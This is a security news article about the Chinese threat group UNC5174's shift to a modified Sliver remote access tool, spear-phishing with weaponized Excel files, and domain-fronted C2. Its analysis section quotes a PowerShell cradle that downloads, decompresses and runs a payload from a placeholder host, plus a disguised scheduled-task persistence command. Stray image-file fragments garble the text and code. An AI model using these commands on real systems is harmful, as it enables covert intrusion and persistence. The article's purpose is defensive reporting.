Cybersecurity researchers have uncovered a significant evolution in the tactics of the Chinese threat group UNC5174, which has incorporated a new open-source tool and command-and-control (C2) infrastructure into their malicious operations.
The group, known for targeting government institutions and critical infrastructure across Southeast Asia and North America, has expanded their arsenal with a modified version of an open-source remote access tool that enables persistent access to compromised networks while evading traditional detection methods.
This development represents a concerning advancement in the group’s technical capabilities and operational sophistication.
.png
)
UNC5174, active since at least 2018, has historically utilized custom malware and legitimate tools for their operations.
However, this latest campaign marks a strategic shift toward leveraging and modifying publicly available tools, a trend increasingly observed among sophisticated threat actors seeking to blend their activities with legitimate network traffic.
The group’s recent attacks have primarily targeted organizations in the telecommunications, defense, and energy sectors, with initial access typically gained through spear-phishing emails containing malicious Microsoft Office documents or exploiting unpatched public-facing applications.
Sysdig researchers identified the malware during routine threat hunting operations, noting that the group had implemented several novel obfuscation techniques designed to bypass modern endpoint protection platforms.
Analysis of the malware samples revealed UNC5174 had established a robust infrastructure including multiple redundant C2 servers across Eastern Europe and Southeast Asia, significantly expanding their operational resilience compared to previous campaigns.
The impact of these attacks has been substantial, with several organizations reporting data exfiltration and persistent unauthorized access lasting weeks before detection.
Security teams have observed the threat actors moving laterally through networks, harvesting credentials, and establishing multiple persistence mechanisms to ensure continued access even after initial remediation efforts.
This sophisticated approach highlights UNC5174’s focus on long-term intelligence gathering rather than immediate disruptive operations.
Infection Mechanism Analysis
The infection chain begins with a spear-phishing email containing a weaponized Microsoft Excel document that exploits the CVE-2023-xxxx vulnerability.
When opened, the document executes a series of PowerShell commands that establish an initial foothold on the victim’s system:-
$data = (New-Object System.Net.WebClient).DownloadData("hxxps://legitimate-looking-domain.com/resources/document.dat");
$decompressed = [System.IO.Compression.GzipStream]::new([System.IO.MemoryStream]::new($data), [System.IO.Compression.CompressionMode]::Decompress).ReadToEnd();
Invoke-Expression $decompressed.webp)
This PowerShell script downloads an obfuscated payload, which is then decompressed and executed directly in memory, leaving minimal traces on disk.
The deobfuscated payload establishes persistence through a scheduled task masquerading as a legitimate Windows update process:-
schtasks /create /tn "WindowsUpdate\ServiceCheck" /tr "powershell.exe -WindowStyle hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAg..." /sc daily /st 09:15 /fThe malware then beacons to its C2 infrastructure using HTTPS communications that mimic legitimate web browsing patterns (Figure 2: C2 Communication Pattern).
The C2 servers employ domain fronting techniques, routing traffic through trusted cloud services to evade network-based detection systems.
The malware utilizes a modified version of the open-source Sliver framework, which has been customized with additional modules for credential harvesting, keylogging, and screen capture capabilities.
Most notably, UNC5174 has implemented a novel anti-analysis feature that detects virtualized environments by measuring subtle timing differences in CPU operations, allowing it to remain dormant when under analysis in security sandboxes.
This sophisticated evasion technique, combined with the group’s expanded infrastructure, presents significant challenges for defenders attempting to identify and mitigate this threat.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
